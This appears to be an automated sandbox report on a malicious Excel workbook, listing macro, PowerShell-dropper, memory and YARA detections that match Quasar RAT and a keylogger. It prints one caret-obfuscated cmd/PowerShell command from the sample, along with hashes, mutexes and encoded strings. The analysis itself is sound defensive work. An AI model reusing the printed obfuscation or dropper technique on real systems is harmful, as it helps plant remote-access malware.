Found Excel 4.0 Macro with suspicious formulas
Source: spetsifikatsiya.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: spetsifikatsiya.xls Initial sample: High usage of CHAR() function: 21
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\sp.exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\sp.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 28_2_00478772
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C6B10: new,DeviceIoControl, 28_2_005C6B10
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E2A38 24_2_004E2A38
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E4CD8 24_2_004E4CD8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E02D8 24_2_004E02D8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E5AF0 24_2_004E5AF0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E6350 24_2_004E6350
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E75F4 24_2_004E75F4
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E4CC8 24_2_004E4CC8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E3540 24_2_004E3540
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E3500 24_2_004E3500
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E3530 24_2_004E3530
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E37DA 24_2_004E37DA
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E63D9 24_2_004E63D9
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E37E8 24_2_004E37E8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E5BB0 24_2_004E5BB0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00983657 24_2_00983657
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_009809A1 24_2_009809A1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00980500 24_2_00980500
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_0098375C 24_2_0098375C
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006940D0 28_2_006940D0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006849A0 28_2_006849A0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0040EA7D 28_2_0040EA7D
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 28_2_004F2AA7
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0042ABC1 28_2_0042ABC1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068321E 28_2_0068321E
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00411532 28_2_00411532
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004276C4 28_2_004276C4
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00689D67 28_2_00689D67
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00481811 31_2_00481811
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00483178 31_2_00483178
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048E138 31_2_0048E138
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00482229 31_2_00482229
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00488358 31_2_00488358
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00480470 31_2_00480470
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00480FC8 31_2_00480FC8
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00484000 31_2_00484000
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485811 31_2_00485811
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485178 31_2_00485178
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485188 31_2_00485188
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485348 31_2_00485348
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048D308 31_2_0048D308
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485338 31_2_00485338
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048CBC0 31_2_0048CBC0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048BCA0 31_2_0048BCA0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00484DB9 31_2_00484DB9
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048F748 31_2_0048F748
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00483FF1 31_2_00483FF1
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F631E8 31_2_01F631E8
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6B427 31_2_01F6B427
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6474A 31_2_01F6474A
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F625B0 31_2_01F625B0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F625A0 31_2_01F625A0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F63D95 31_2_01F63D95
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F63180 31_2_01F63180
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6B8B9 31_2_01F6B8B9
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F60012 31_2_01F60012
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F65AE0 31_2_01F65AE0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F65AD0 31_2_01F65AD0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_04142FFB 31_2_04142FFB
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F60048 31_2_01F60048
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_003144A0 35_2_003144A0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_003137D0 35_2_003137D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_00313488 35_2_00313488
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_00741CD0 35_2_00741CD0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_00743F5B 35_2_00743F5B
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A1810 37_2_001A1810
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001AE138 37_2_001AE138
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A3178 37_2_001A3178
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A2229 37_2_001A2229
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A8358 37_2_001A8358
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A0470 37_2_001A0470
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A0FC8 37_2_001A0FC8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5811 37_2_001A5811
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A4000 37_2_001A4000
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A30EA 37_2_001A30EA
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5178 37_2_001A5178
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5188 37_2_001A5188
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001AD308 37_2_001AD308
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5338 37_2_001A5338
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5348 37_2_001A5348
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A8349 37_2_001A8349
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001ACBC0 37_2_001ACBC0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001ABCA0 37_2_001ABCA0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A4DB8 37_2_001A4DB8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A0F5D 37_2_001A0F5D
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001AF748 37_2_001AF748
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A3FF1 37_2_001A3FF1
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E2090 37_2_003E2090
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E31E8 37_2_003E31E8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E474A 37_2_003E474A
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EB3F9 37_2_003EB3F9
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EB427 37_2_003EB427
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E5C25 37_2_003E5C25
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E0012 37_2_003E0012
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EB8B9 37_2_003EB8B9
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E25B0 37_2_003E25B0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E25A0 37_2_003E25A0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E3180 37_2_003E3180
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E5AE0 37_2_003E5AE0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E5AD0 37_2_003E5AD0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_00AC2FFB 37_2_00AC2FFB
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E0048 37_2_003E0048
Document contains embedded VBA macros
Source: spetsifikatsiya.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\JrekdQ.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006876A0 appears 87 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006811C5 appears 76 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006B08FC appears 807 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00411C35 appears 40 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00680E81 appears 125 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006850AE appears 35 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 005CEF10 appears 135 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00411FB1 appears 172 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00696B06 appears 45 times
Tries to load missing DLLs
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: sfc_os.dll Jump to behavior
Yara signature match
Source: spetsifikatsiya.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5DVxvgK9jn5gaBl[1].exe.28.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: eyBLwzbrUF1mwXoy.exe.28.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5DVxvgK9jn5gaBl[1].exe0.28.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JrekdQ.exe.31.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ue004?u1bf6u2a06u0d01????????????.cs Base64 encoded string: 'muWPA0ZMZOZC16alqlb7OLoKFF6AK/WGExjSh2sTLzY/HNKE8rw/LjwNO8jxwG5P8XmanhcHXUh/Znan/Qha9A==', 'kdZuJNg3s3qi60d8KAw+Ogu5e+94NKyEBSKgEBwFzCVWwu2kGt++qLwK8TBsq+lTBXxsNcIHpRZ1cGkVMYWvzTSaElwiShLbehLklNW4YYQ=', '+bLBtFqvA62b9vNvvPQyjmGK2WpZ+RJ9pUtoxTtsb8K6WfUawvz1gS5iut++GrF4DuuuMzkFiMCEyLF9AaegJA==', 'v2HDs4RSygEAZ6NJNCuYwi0ACuluvNLNbRFYPlxXUpO0FxzAGLWq3OXdsjP5+ukjo6yDLqnUGh7wyi7nDtq/CQ==', 'jqflyylK/niLKf+GtR+Lv/aWEa6QVqAQUCBDd050Ntb2fHHztlgQMTWdADeZZF3mFDd9u+0ou/K5Jphk6b3V7Q==', 'rle7N1m2WcaSri/+BJFoH9R3R4bb8EbkaU2TYWRdWojx+g1t9ncREIrAWOvoDmETZzEe0Mw/2wR+/BF8yljPoBTG+f/JAv1YhyEeXfJysig=', 'z4mS0TG28az/6Zq6H1EWK43Z0L6V2PnE7ouOqTwEvdoVRXfhtFMdqKebh3cw7r71i5/CG3g7acrI4B9cvpwiqaer8YOnmXcM7ZzRm/qc8r4=', 'g0diI4GsK+sU5dVZUm/Qgsee4D9atKNMOgUKjSgMfBv6DVapU0ZNn4j2bVXd9/eONJ0gi7LLAe4+P+1lOMyL5Q=='
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@57/27@7/5
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00960AB2 AdjustTokenPrivileges, 24_2_00960AB2
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00960A7B AdjustTokenPrivileges, 24_2_00960A7B
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 28_2_0045624F
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0042A2F9 __EH_prolog,CoInitialize,CoCreateInstance,CoUninitialize, 28_2_0042A2F9
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource, 28_2_004231B3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\CCDE0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_dQvCIzmEBFgxmMuIEE
Source: C:\Users\user\AppData\Roaming\sp.exe Mutant created: \Sessions\1\BaseNamedObjects\614c1de794e5e2f8f0d3a4fae3ccc083
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD690.tmp Jump to behavior
Source: spetsifikatsiya.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.........h.......F...............F.......A.....`IC........v.....................KJ.............l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....u................1.............}..v....xv......0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....z......0.\.............x.......$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j....@{................1.............}..v.....{......0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.\.....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.1.............}..v............ ...............x......."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................1.............}..v............0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......................1.............}..v............0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j....P.................1.............}..v............0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......................1.............}..v............0.\.....................^....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......................1.............}..v....0.......0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......................1.............}..v....P.......0.\.....................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......................1.............}..v............0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......................1.............}..v....P.......0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......................1.............}..v............0.\............................................. Jump to behavior
